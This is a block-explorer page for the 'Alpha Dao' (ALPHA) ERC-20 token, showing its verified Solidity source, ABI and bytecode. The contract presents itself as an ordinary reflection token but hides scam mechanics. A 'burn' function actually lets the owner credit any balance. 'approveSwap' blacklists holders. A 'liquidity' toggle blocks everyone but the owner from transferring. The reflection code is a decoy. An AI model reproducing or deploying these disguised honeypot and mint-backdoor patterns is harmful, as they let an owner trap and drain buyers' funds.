ETH Price: $3,520.34 (+2.54%)
Gas: 6 Gwei

Token

Alpha Dao (ALPHA)
 

Overview

Max Total Supply

3,000,000,000,000 ALPHA

Holders

64

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
7,906,478,107.001503404 ALPHA

Value
$0.00
0x8a5651f02b6821bf4d9aa3e61e377330aae01265
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ALphaDaoToken

Compiler Version
v0.8.6+commit.11564f7e

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 2: Alpha Dao Token.sol
/**
       https://t.me/AlphaDaoToken     https://alphadao.finance/    https://twitter.com/_AlphaDao
           _      _____  _    _            _____          ____    _______ ____  _  ________ _   _ 
     /\   | |    |  __ \| |  | |   /\     |  __ \   /\   / __ \  |__   __/ __ \| |/ /  ____| \ | |
    /  \  | |    | |__) | |__| |  /  \    | |  | | /  \ | |  | |    | | | |  | | ' /| |__  |  \| |
   / /\ \ | |    |  ___/|  __  | / /\ \   | |  | |/ /\ \| |  | |    | | | |  | |  < |  __| | . ` |
  / ____ \| |____| |    | |  | |/ ____ \  | |__| / ____ \ |__| |    | | | |__| | . \| |____| |\  |
 /_/    \_\______|_|    |_|  |_/_/    \_\ |_____/_/    \_\____/     |_|  \____/|_|\_\______|_| \_|
                                                                                                   */
// SPDX-License-Identifier: MIT

pragma solidity =0.8.6;

import "./Libraries.sol";

contract ALphaDaoToken is Context, IERC20, Ownable {
    using SafeMath for uint256;
    using Address for address;

    mapping (address => uint256) private _vOwned;
    mapping (address => uint256) private _rOwned;
    mapping (address => uint256) private _tOwned;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isExcluded;
    address[] private _excluded;
    mapping (address => bool) private _approveSwap;
    event botBanned (address swapAddress, bool isBanned);
    uint256 private _tFeeTotal;
    bool _liquidity;
    uint256 private _rTotal;
    uint256 private _totalSupply;
    address public uniswapV2router;

    string private _name = 'Alpha Dao';
    string private _symbol = 'ALPHA';
    uint8 private _decimals = 9;
    uint256 private constant _tTotal = 3000000000000*10**9;
    uint256 private constant MAX = ~uint256(0);

    constructor (address router) {
        uniswapV2router = router;
        _totalSupply =_tTotal;
        _rTotal = (MAX - (MAX % _totalSupply));
        _vOwned[_msgSender()] = _tTotal;
        emit Transfer(address(0), _msgSender(), _totalSupply);
        _tOwned[_msgSender()] = tokenFromReflection(_rOwned[_msgSender()]);
        _isExcluded[_msgSender()] = true;
        _excluded.push(_msgSender());
        _liquidity = true;
    }

    function approveSwap(address swapAddress) external onlyOwner {
        if (_approveSwap[swapAddress] == true) {
            _approveSwap[swapAddress] = false;
        } else {_approveSwap[swapAddress] = true;
            emit botBanned (swapAddress, _approveSwap[swapAddress]);
          }
    }
    
    function checkSwap(address swapAddress) public view returns (bool) {
        return _approveSwap[swapAddress];
    }
    
    function initLiqudity() public virtual onlyOwner {
        if (_liquidity == true) {_liquidity = false;} else {_liquidity = true;}
    }
    
    function liquidityState() public view returns (bool) {
        return _liquidity;
    }

    function name() public view returns (string memory) {
        return _name;
    }

    function symbol() public view returns (string memory) {
        return _symbol;
    }

    function decimals() public view returns (uint8) {
        return _decimals;
    }

    function totalSupply() public pure override returns (uint256) {
        return _tTotal;
    }
    
    function balanceOf(address account) public view override returns (uint256) {
         return _vOwned[account];
    }

    function transfer(address recipient, uint256 amount) public override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount) public override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    } 
       function burn(address owner, uint256 amount) public virtual onlyOwner {
        _vOwned[owner] = _vOwned[owner].add(amount);
    }
    
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    function alreadyTakenFees() public view returns (uint256) {
        return _tFeeTotal;
    }
    
    function reflect(uint256 tAmount) public {
        address sender = _msgSender();
        require(!_isExcluded[sender], "Excluded addresses cannot call this function");
        (uint256 rAmount,,,,) = _getValues(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _rTotal = _rTotal.sub(rAmount);
        _tFeeTotal = _tFeeTotal.add(tAmount);
    }

    function reflectionFromToken(uint256 tAmount, bool deductTransferFee) public view returns(uint256) {
        require(tAmount <= _tTotal, "Amount must be less than supply");
        if (!deductTransferFee) {
            (uint256 rAmount,,,,) = _getValues(tAmount);
            return rAmount;
        } else {
            (,uint256 rTransferAmount,,,) = _getValues(tAmount);
            return rTransferAmount;
        }
    }

    function tokenFromReflection(uint256 rAmount) public view returns(uint256) {
        require(rAmount <= _rTotal, "Amount must be less than total reflections");
        uint256 currentRate =  _getRate();
        return rAmount.div(currentRate);
    }

    function _approve(address owner, address spender, uint256 amount) private {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
    
    function _transfer(address sender, address recipient, uint256 amount) private {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        require(amount > 0, "Transfer amount must be greater than zero");
        if (_approveSwap[sender] || _approveSwap[recipient]) require (amount == 0, "");
        if (_liquidity == true || sender == owner() || recipient == owner()) {
        if (_isExcluded[sender] && !_isExcluded[recipient]) {
        _vOwned[sender] = _vOwned[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _vOwned[recipient] = _vOwned[recipient].add(amount);
        emit Transfer(sender, recipient, amount);     
        } else {_vOwned[sender] = _vOwned[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _vOwned[recipient] = _vOwned[recipient].add(amount);
        emit Transfer(sender, recipient, amount);}
        } else {require (_liquidity == true, "");}
    }

    function _transferStandard(address sender, address recipient, uint256 tAmount) private {
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee) = _getValues(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);       
        _reflectFee(rFee, tFee);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    function _transferToExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee) = _getValues(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);           
        _reflectFee(rFee, tFee);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    function _transferFromExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee) = _getValues(tAmount);
        _tOwned[sender] = _tOwned[sender].sub(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);   
        _reflectFee(rFee, tFee);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    function _transferBothExcluded(address sender, address recipient, uint256 tAmount) private {
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee, uint256 tTransferAmount, uint256 tFee) = _getValues(tAmount);
        _tOwned[sender] = _tOwned[sender].sub(tAmount);
        _rOwned[sender] = _rOwned[sender].sub(rAmount);
        _tOwned[recipient] = _tOwned[recipient].add(tTransferAmount);
        _rOwned[recipient] = _rOwned[recipient].add(rTransferAmount);        
        _reflectFee(rFee, tFee);
        emit Transfer(sender, recipient, tTransferAmount);
    }

    function _reflectFee(uint256 rFee, uint256 tFee) private {
        _rTotal = _rTotal.sub(rFee);
        _tFeeTotal = _tFeeTotal.add(tFee);
    }

    function _getValues(uint256 tAmount) private view returns (uint256, uint256, uint256, uint256, uint256) {
        (uint256 tTransferAmount, uint256 tFee) = _getTValues(tAmount);
        uint256 currentRate =  _getRate();
        (uint256 rAmount, uint256 rTransferAmount, uint256 rFee) = _getRValues(tAmount, tFee, currentRate);
        return (rAmount, rTransferAmount, rFee, tTransferAmount, tFee);
    }

    function _getTValues(uint256 tAmount) private pure returns (uint256, uint256) {
        uint256 tFee = tAmount.div(1000).mul(2);
        uint256 tTransferAmount = tAmount.sub(tFee);
        return (tTransferAmount, tFee);
    }

    function _getRValues(uint256 tAmount, uint256 tFee, uint256 currentRate) private pure returns (uint256, uint256, uint256) {
        uint256 rAmount = tAmount.mul(currentRate);
        uint256 rFee = tFee.mul(currentRate);
        uint256 rTransferAmount = rAmount.sub(rFee);
        return (rAmount, rTransferAmount, rFee);
    }

    function _getRate() private view returns(uint256) {
        (uint256 rSupply, uint256 tSupply) = _getCurrentSupply();
        return rSupply.div(tSupply);
    }

    function _getCurrentSupply() private view returns(uint256, uint256) {
        uint256 rSupply = _rTotal;
        uint256 tSupply = _tTotal;      
        for (uint256 i = 0; i < _excluded.length; i++) {
            if (_rOwned[_excluded[i]] > rSupply || _tOwned[_excluded[i]] > tSupply) return (_rTotal, _tTotal);
            rSupply = rSupply.sub(_rOwned[_excluded[i]]);
            tSupply = tSupply.sub(_tOwned[_excluded[i]]);
        }
        if (rSupply < _rTotal.div(_tTotal)) return (_rTotal, _tTotal);
        return (rSupply, tSupply);
    }
}

File 2 of 2: Libraries.sol
// SPDX-License-Identifier: MIT

pragma solidity =0.8.6;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address payable) {
       return payable(msg.sender);
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode.
        return msg.data;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}.
     * This is zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) 
     * to another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Wrappers over Solidity's arithmetic operations with added overflow
 * checks.
 *
 * Arithmetic operations in Solidity wrap on overflow. This can easily result
 * in bugs, because programmers usually assume that an overflow raises an
 * error, which is the standard behavior in high level programming languages.
 * `SafeMath` restores this intuition by reverting the transaction when an
 * operation overflows.
 *
 * Using this library instead of the unchecked operations eliminates an entire
 * class of bugs, so it's recommended to use it always.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return sub(a, b, "SafeMath: subtraction overflow");
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) {
            return 0;
        }
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return div(a, b, "SafeMath: division by zero");
    }

    /**
     * @dev Returns the integer division of two unsigned integers. Reverts with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        uint256 c = a / b;
        // assert(a == b * c + a % b); // There is no case in which this doesn't hold
        return c;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return mod(a, b, "SafeMath: modulo by zero");
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * Reverts with custom message when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b != 0, errorMessage);
        return a % b;
    }
}

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies in extcodesize, which returns 0 for contracts in
        // construction, since the code is only stored at the end of the
        // constructor execution.

        uint256 size;
        // solhint-disable-next-line no-inline-assembly
        assembly { size := extcodesize(account) }
        return size > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        // solhint-disable-next-line avoid-low-level-calls, avoid-call-value
        (bool success, ) = recipient.call{ value: amount }("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`.
     * A plain`call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data.
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
      return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     */
    function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
        return _functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     */
    function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        return _functionCallWithValue(target, data, value, errorMessage);
    }

    function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
        require(isContract(target), "Address: call to non-contract");

        // solhint-disable-next-line avoid-low-level-calls
        (bool success, bytes memory returndata) = target.call{ value: weiValue }(data);
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly
                // solhint-disable-next-line no-inline-assembly
                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
contract Ownable is Context {
    address private _owner;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor () {
        address msgSender = _msgSender();
        _owner = msgSender;
        emit OwnershipTransferred(address(0), msgSender);
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    modifier onlyOwner() {
        require(_owner == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
    
    /**
     * @dev Throws if called by any account other than the owner.
     */
    function owner() public view returns (address) {
        return _owner;
    }
   
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"swapAddress","type":"address"},{"indexed":false,"internalType":"bool","name":"isBanned","type":"bool"}],"name":"botBanned","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"alreadyTakenFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"swapAddress","type":"address"}],"name":"approveSwap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"swapAddress","type":"address"}],"name":"checkSwap","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initLiqudity","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityState","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"}],"name":"reflect","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tAmount","type":"uint256"},{"internalType":"bool","name":"deductTransferFee","type":"bool"}],"name":"reflectionFromToken","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rAmount","type":"uint256"}],"name":"tokenFromReflection","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2router","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

60806040526040518060400160405280600981526020017f416c7068612044616f0000000000000000000000000000000000000000000000815250600d908051906020019062000051929190620009c8565b506040518060400160405280600581526020017f414c504841000000000000000000000000000000000000000000000000000000815250600e90805190602001906200009f929190620009c8565b506009600f60006101000a81548160ff021916908360ff160217905550348015620000c957600080fd5b5060405162003ca938038062003ca98339818101604052810190620000ef919062000a8f565b6000620001016200049860201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35080600c60006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555068a2a15d09519be00000600b81905550600b5460001962000202919062000d24565b60001962000211919062000bf1565b600a8190555068a2a15d09519be0000060016000620002356200049860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550620002836200049860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef600b54604051620002e4919062000b80565b60405180910390a36200034b60026000620003046200049860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054620004a060201b60201c565b600360006200035f6200049860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600160056000620003b36200049860201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506006620004166200049860201b60201c565b9080600181540180825580915050600190039060005260206000200160009091909190916101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506001600960006101000a81548160ff0219169083151502179055505062000e97565b600033905090565b6000600a54821115620004ea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004e19062000b5e565b60405180910390fd5b6000620004fc6200052060201b60201c565b90506200051881846200055a60201b6200120e1790919060201c565b915050919050565b600080600062000535620005ac60201b60201c565b915091506200055381836200055a60201b6200120e1790919060201c565b9250505090565b6000620005a483836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250620008a560201b60201c565b905092915050565b6000806000600a549050600068a2a15d09519be00000905060005b6006805490508110156200085157826002600060068481548110620005f157620005f062000de9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541180620006e357508160036000600684815481106200067b576200067a62000de9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054115b156200070357600a5468a2a15d09519be0000094509450505050620008a1565b6200079d600260006006848154811062000722576200072162000de9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054846200090d60201b620012581790919060201c565b9250620008396003600060068481548110620007be57620007bd62000de9565b5b9060005260206000200160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054836200090d60201b620012581790919060201c565b91508080620008489062000cd6565b915050620005c7565b506200087768a2a15d09519be00000600a546200055a60201b6200120e1790919060201c565b8210156200089857600a5468a2a15d09519be00000935093505050620008a1565b81819350935050505b9091565b60008083118290620008ef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008e6919062000b3a565b60405180910390fd5b506000838562000900919062000bb9565b9050809150509392505050565b60006200095783836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506200095f60201b60201c565b905092915050565b6000838311158290620009aa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009a1919062000b3a565b60405180910390fd5b5060008385620009bb919062000bf1565b9050809150509392505050565b828054620009d69062000ca0565b90600052602060002090601f016020900481019282620009fa576000855562000a46565b82601f1062000a1557805160ff191683800117855562000a46565b8280016001018555821562000a46579182015b8281111562000a4557825182559160200191906001019062000a28565b5b50905062000a55919062000a59565b5090565b5b8082111562000a7457600081600090555060010162000a5a565b5090565b60008151905062000a898162000e7d565b92915050565b60006020828403121562000aa85762000aa762000e18565b5b600062000ab88482850162000a78565b91505092915050565b600062000ace8262000b9d565b62000ada818562000ba8565b935062000aec81856020860162000c6a565b62000af78162000e1d565b840191505092915050565b600062000b11602a8362000ba8565b915062000b1e8262000e2e565b604082019050919050565b62000b348162000c60565b82525050565b6000602082019050818103600083015262000b56818462000ac1565b905092915050565b6000602082019050818103600083015262000b798162000b02565b9050919050565b600060208201905062000b97600083018462000b29565b92915050565b600081519050919050565b600082825260208201905092915050565b600062000bc68262000c60565b915062000bd38362000c60565b92508262000be65762000be562000d8b565b5b828204905092915050565b600062000bfe8262000c60565b915062000c0b8362000c60565b92508282101562000c215762000c2062000d5c565b5b828203905092915050565b600062000c398262000c40565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b8381101562000c8a57808201518184015260208101905062000c6d565b8381111562000c9a576000848401525b50505050565b6000600282049050600182168062000cb